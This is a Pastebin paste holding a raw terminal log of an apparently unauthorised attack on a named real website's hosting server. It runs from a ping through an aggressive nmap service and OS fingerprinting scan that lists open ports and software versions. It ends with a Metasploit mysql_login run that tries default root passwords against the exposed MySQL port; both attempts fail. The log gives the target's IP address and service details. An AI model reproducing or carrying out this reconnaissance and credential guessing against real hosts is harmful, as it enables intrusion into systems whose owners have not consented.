Advertisement
Guest User

Untitled

a guest
Apr 25th, 2016
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.68 KB | None | 0 0
  1. lionsec-l3@ubuntu:~$ ping www.micesony.com
  2. PING micesony.com (108.179.252.199) 56(84) bytes of data.
  3.  
  4. ============
  5.  
  6. root@ubuntu:/home/lionsec-l3# nmap -sS -sV 108.179.252.199 -O --version-intensity 9 -vv
  7.  
  8. Starting Nmap 6.40 ( http://nmap.org ) at 2016-04-25 03:18 BRT
  9. NSE: Loaded 23 scripts for scanning.
  10. Initiating Ping Scan at 03:18
  11. Scanning 108.179.252.199 [4 ports]
  12. Completed Ping Scan at 03:18, 0.06s elapsed (1 total hosts)
  13. Initiating Parallel DNS resolution of 1 host. at 03:18
  14. Completed Parallel DNS resolution of 1 host. at 03:18, 0.01s elapsed
  15. Initiating SYN Stealth Scan at 03:18
  16. Scanning br546-ip05.hostgator.com.br (108.179.252.199) [1000 ports]
  17. Discovered open port 80/tcp on 108.179.252.199
  18. Discovered open port 587/tcp on 108.179.252.199
  19. Discovered open port 3306/tcp on 108.179.252.199
  20. Discovered open port 443/tcp on 108.179.252.199
  21. Discovered open port 25/tcp on 108.179.252.199
  22. Discovered open port 8080/tcp on 108.179.252.199
  23. Discovered open port 110/tcp on 108.179.252.199
  24. Discovered open port 993/tcp on 108.179.252.199
  25. Discovered open port 995/tcp on 108.179.252.199
  26. Discovered open port 21/tcp on 108.179.252.199
  27. Discovered open port 53/tcp on 108.179.252.199
  28. Discovered open port 143/tcp on 108.179.252.199
  29. Discovered open port 2222/tcp on 108.179.252.199
  30. SYN Stealth Scan Timing: About 36.10% done; ETC: 03:20 (0:00:57 remaining)
  31. Discovered open port 26/tcp on 108.179.252.199
  32. Discovered open port 465/tcp on 108.179.252.199
  33. SYN Stealth Scan Timing: About 65.35% done; ETC: 03:20 (0:00:41 remaining)
  34. Discovered open port 8443/tcp on 108.179.252.199
  35. Completed SYN Stealth Scan at 03:20, 126.35s elapsed (1000 total ports)
  36. Initiating Service scan at 03:20
  37. Scanning 16 services on br546-ip05.hostgator.com.br (108.179.252.199)
  38. Completed Service scan at 03:21, 29.47s elapsed (16 services on 1 host)
  39. Initiating OS detection (try #1) against br546-ip05.hostgator.com.br (108.179.252.199)
  40. Retrying OS detection (try #2) against br546-ip05.hostgator.com.br (108.179.252.199)
  41. sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
  42. Offending packet: TCP 192.168.211.137:43604 > 108.179.252.199:21 S ttl=53 id=62456 iplen=60 seq=818366373 win=1 <wscale 10,nop,mss 1460,timestamp 4294967295 0,sackOK>
  43. sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
  44. Offending packet: TCP 192.168.211.137:43605 > 108.179.252.199:21 S ttl=44 id=5295 iplen=60 seq=818366374 win=63 <mss 1400,wscale 0,sackOK,timestamp 4294967295 0,eol>
  45. sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
  46. Offending packet: TCP 192.168.211.137:43606 > 108.179.252.199:21 S ttl=58 id=35458 iplen=60 seq=818366375 win=4 <timestamp 4294967295 0,nop,nop,wscale 5,nop,mss 640>
  47. sendto in send_ip_packet_sd: sendto(5, packet, 56, 0, 108.179.252.199, 16) => Network is unreachable
  48. Offending packet: TCP 192.168.211.137:43607 > 108.179.252.199:21 S ttl=42 id=49445 iplen=56 seq=818366376 win=4 <sackOK,timestamp 4294967295 0,wscale 10,eol>
  49. sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
  50. Offending packet: TCP 192.168.211.137:43608 > 108.179.252.199:21 S ttl=53 id=2768 iplen=60 seq=818366377 win=16 <mss 536,sackOK,timestamp 4294967295 0,wscale 10,eol>
  51. sendto in send_ip_packet_sd: sendto(5, packet, 56, 0, 108.179.252.199, 16) => Network is unreachable
  52. Offending packet: TCP 192.168.211.137:43609 > 108.179.252.199:21 S ttl=52 id=33426 iplen=56 seq=818366378 win=512 <mss 265,sackOK,timestamp 4294967295 0>
  53. sendto in send_ip_packet_sd: sendto(5, packet, 148, 0, 108.179.252.199, 16) => Network is unreachable
  54. Offending packet: ICMP [192.168.211.137 > 108.179.252.199 Echo request (type=8/code=9) id=51695 seq=295] IP [ttl=53 id=18033 iplen=148 ]
  55. sendto in send_ip_packet_sd: sendto(5, packet, 178, 0, 108.179.252.199, 16) => Network is unreachable
  56. Offending packet: ICMP [192.168.211.137 > 108.179.252.199 Echo request (type=8/code=0) id=51696 seq=296] IP [ttl=46 id=15626 iplen=178 ]
  57. sendto in send_ip_packet_sd: sendto(5, packet, 328, 0, 108.179.252.199, 16) => Network is unreachable
  58. Offending packet: UDP 192.168.211.137:43680 > 108.179.252.199:42604 ttl=62 id=4162 iplen=328
  59. send_ip_packet in send_closedudp_probe: Network is unreachable (101)
  60. sendto in send_ip_packet_sd: sendto(5, packet, 60, 0, 108.179.252.199, 16) => Network is unreachable
  61. Offending packet: TCP 192.168.211.137:43610 > 108.179.252.199:21 S ttl=40 id=57916 iplen=60 seq=818366373 win=1 <wscale 10,nop,mss 1460,timestamp 4294967295 0,sackOK>
  62. Omitting future Sendto error messages now that 10 have been shown. Use -d2 if you really want to see them.
  63. send_ip_packet in send_closedudp_probe: Network is unreachable (101)
  64. NSE: Script scanning 108.179.252.199.
  65. NSE: Starting runlevel 1 (of 1) scan.
  66. Initiating NSE at 03:22
  67. Completed NSE at 03:22, 15.43s elapsed
  68. Nmap scan report for br546-ip05.hostgator.com.br (108.179.252.199)
  69. Host is up (0.32s latency).
  70. Scanned at 2016-04-25 03:18:32 BRT for 233s
  71. Not shown: 981 closed ports
  72. PORT STATE SERVICE VERSION
  73. 21/tcp open ftp Pure-FTPd
  74. 22/tcp filtered ssh
  75. 25/tcp open smtp Exim smtpd 4.86_1
  76. 26/tcp open smtp Exim smtpd 4.86_1
  77. 53/tcp open domain
  78. 80/tcp open http nginx 1.8.1
  79. 110/tcp open pop3 Dovecot pop3d
  80. 143/tcp open imap Dovecot imapd
  81. 443/tcp open ssl/http Apache httpd
  82. 465/tcp open smtps?
  83. 514/tcp filtered shell
  84. 587/tcp open smtp Exim smtpd 4.86_1
  85. 646/tcp filtered ldp
  86. 993/tcp open ssl/imap Dovecot imapd
  87. 995/tcp open ssl/pop3 Dovecot pop3d
  88. 2222/tcp open ssh OpenSSH 5.3 (protocol 2.0)
  89. 3306/tcp open mysql MySQL 5.5.40-36.1
  90. 8080/tcp open http nginx 1.8.1
  91. 8443/tcp open http nginx 1.8.1
  92. Device type: general purpose|storage-misc
  93. Running (JUST GUESSING): Microsoft Windows 7|XP (92%), Linux 2.4.X|3.X (90%), BlueArc embedded (85%)
  94. OS CPE: cpe:/o:microsoft:windows_7:::enterprise cpe:/o:microsoft:windows_xp::sp3 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3 cpe:/h:bluearc:titan_2100
  95. OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
  96. Aggressive OS guesses: Microsoft Windows 7 Enterprise (92%), Microsoft Windows XP SP3 (92%), DD-WRT v24-sp2 (Linux 2.4.37) (90%), Linux 3.2 (90%), BlueArc Titan 2100 NAS device (85%)
  97. No exact OS matches for host (test conditions non-ideal).
  98. TCP/IP fingerprint:
  99. SCAN(V=6.40%E=4%D=4/25%OT=21%CT=1%CU=%PV=N%G=N%TM=571DB7A1%P=x86_64-unknown-linux-gnu)
  100. SEQ(CI=RI%TS=U)
  101. SEQ(CI=I)
  102. OPS(O1=M5B4%O2=%O3=%O4=%O5=%O6=)
  103. WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6=FAF0)
  104. ECN(R=Y%DF=N%TG=80%W=FAF0%O=%CC=N%Q=)
  105. T1(R=Y%DF=N%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
  106. T2(R=N)
  107. T3(R=Y%DF=N%TG=80%W=FAF0%S=O%A=S+%F=AR%O=%RD=0%Q=)
  108. T4(R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)
  109. T5(R=Y%DF=N%TG=80%W=FAF0%S=O%A=S+%F=AR%O=%RD=0%Q=)
  110. T6(R=Y%DF=N%TG=80%W=7FFF%S=A%A=Z%F=R%O=%RD=0%Q=)
  111. T7(R=N)
  112. U1(R=N)
  113. IE(R=N)
  114.  
  115. Service Info: Host: br546.hostgator.com.br
  116.  
  117. Read data files from: /usr/bin/../share/nmap
  118. OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  119. Nmap done: 1 IP address (1 host up) scanned in 233.99 seconds
  120. Raw packets sent: 1150 (54.568KB) | Rcvd: 1097 (43.977KB)
  121.  
  122. =============================
  123.  
  124. msf auxiliary(mysql_login) > exploit
  125.  
  126. [*] 108.179.252.199:3306 MYSQL - Found remote MySQL version 5.5.40
  127. [*] 108.179.252.199:3306 MYSQL - [1/2] - Trying username:'root' with password:''
  128. [-] Access
  129. [*] 108.179.252.199:3306 MYSQL - [2/2] - Trying username:'root' with password:'root'
  130. [-] Access
  131. [*] Scanned 1 of 1 hosts (100% complete)
  132. [*] Auxiliary module execution completed
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement